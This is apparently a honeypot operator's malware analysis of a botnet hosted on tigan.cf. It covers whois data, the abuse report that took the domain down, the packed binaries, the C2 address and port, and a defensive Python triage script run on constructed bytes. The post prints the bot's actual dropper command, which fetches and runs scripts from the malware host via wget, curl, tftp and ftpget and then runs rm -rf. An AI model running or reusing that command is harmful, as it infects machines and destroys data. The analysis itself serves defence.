I noticed a domain, tigan.cf, was being used to serve malware. The malware also seems to use one IP address as its C2 server (54.37.79.0, over port 666). Usually, botnets use a distributed C2 architecture, making them difficult to take down. Since this malware is centralized, it's easy to take down.
(Update: they changed their C2 and host from an IP address now)
Output of whois tigan.cf:
Domain name:
TIGAN.CF
Organisation:
Centrafrique TLD B.V.
Dot CF administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax: +31 20 5315721
E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com
Domain Nameservers:
BETH.NS.CLOUDFLARE.COM
LYNN.NS.CLOUDFLARE.COM
Your selected domain name is a Free Domain. That means that,
according to the terms and conditions of Free Domain domain names
the registrant is Centrafrique TLD B.V.
Due to restrictions in Dot CF 's Privacy Statement personal information
about the user of the domain name cannot be released.
ABUSE OF A DOMAIN NAME
If you want to report abuse of this domain name, please send a
detailed email with your complaint to abuse@freenom.com.
In most cases Dot CF responds to abuse complaints within one business day.
COPYRIGHT INFRINGEMENT
If you want to report a case of copyright infringement, please send
an email to copyright@freenom.com, and include the full name and address of
your organization. Within 5 business days copyright infringement notices
will be investigated.
Record maintained by: Dot CF Domain Registry
I sent an email to the abuse contact provided, and they took down the site! I first saw the site 2021-12-03, and there were 7 total attempts on my server from 5 unique IP addresses. The site was shut down on 12/13/2021. The malware itself is made of a few bash scripts and binaries. The binaries are packed with UPX, but the 'UPX!' string is replaced with YTX™. There was one sample labeled 'haiduc' that uses the library libssh. This seems to be an SSH bruteforcer. One of the bash scripts, go, runs haiduc with these arguments.
./haiduc $threads -f i pass.fnl $port "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://tigan.cf/sh; curl -O http://tigan.cf/sh; chmod 777 sh; sh sh; tftp tigan.cf -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g tigan.cf; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 tigan.cf .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *"
The variables $threads and $port were set to 1500 and 22 respectively. The file pass.fnl is a password list, which matches the credentials used against my honeypot. The command given as a string also matches the command the bot ran. The file 'x86.keen.onion.1337' seems to be the C2 agent. The string 54.37.79.0:666 is embedded inside it. It also had strings such as "HTTPSTOMP", "CRUSH", and "STOP". It seems that these are commands that the malware can act on. According to the linked article, many of the commands are used for DoS.
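As an added triage example (not code from this post, and not run against the real sample), the script below does the two static checks described above on a binary: it looks for the stock UPX magic and for the substituted marker, pulls out ip:port strings as C2 candidates, and writes a same-length patch that restores 'UPX!' so stock upx -d can unpack the file. It assumes that the "YTX™" shown above is how a viewer rendered "YTX" plus one non-ASCII byte (UPX header fields are fixed-width, so the substitute must also be 4 bytes); the SAMPLE bytes are constructed, not taken from the sample.

```python
import re
from typing import Dict, List, Tuple

UPX_MAGIC = b"UPX!"
# Assumption: the substitute magic is "YTX" followed by a single non-ASCII byte (4 bytes total).
ALT_MAGIC_RE = re.compile(rb"YTX[\x80-\xff]")
IP_PORT_RE = re.compile(rb"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})(?!\d)")

def scan_upx_markers(data: bytes) -> Dict[str, List[int]]:
    """Offsets of the stock UPX magic and of the suspected substitute magic."""
    return {
        "UPX!": [m.start() for m in re.finditer(rb"UPX!", data)],
        "YTX?": [m.start() for m in ALT_MAGIC_RE.finditer(data)],
    }

def extract_c2_candidates(data: bytes) -> List[Tuple[str, int]]:
    """ip:port strings in the binary, keeping only syntactically valid IPv4/port pairs."""
    found = []
    for ip, port in IP_PORT_RE.findall(data):
        octets = [int(o) for o in ip.split(b".")]
        p = int(port)
        if all(o <= 255 for o in octets) and 0 < p <= 65535:
            found.append((ip.decode(), p))
    return found

def restore_upx_magic(data: bytes, alt_magic: bytes) -> bytes:
    """Patch the substituted magic back to 'UPX!'. The replacement must keep the same
    length, otherwise every header offset after it would shift and unpacking would fail."""
    if len(alt_magic) != len(UPX_MAGIC):
        raise ValueError("substitute magic must be exactly 4 bytes")
    return data.replace(alt_magic, UPX_MAGIC)

def triage(data: bytes) -> dict:
    markers = scan_upx_markers(data)
    alt = data[markers["YTX?"][0]:markers["YTX?"][0] + 4] if markers["YTX?"] else None
    return {
        "upx_info_string": b"UPX executable packer" in data,
        "markers": markers,
        "c2": extract_c2_candidates(data),
        "alt_magic": alt,
    }

# Constructed stand-in for a packed ELF; not bytes from the real x86.keen.onion.1337 file.
SAMPLE = (b"\x7fELF" + b"\x00" * 8 + b"YTX\x99" + b"\x0d\x16\x02\x00" + b"\x00" * 16
          + b"54.37.79.0:666\x00HTTPSTOMP\x00CRUSH\x00STOP\x00"
          + b"$Info: This file is packed with the UPX executable packer $\x00"
          + b"YTX\x99" + b"\x00" * 8)

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report)
    if report["alt_magic"]:
        print("UPX! restored at", scan_upx_markers(restore_upx_magic(SAMPLE, report["alt_magic"]))["UPX!"])
```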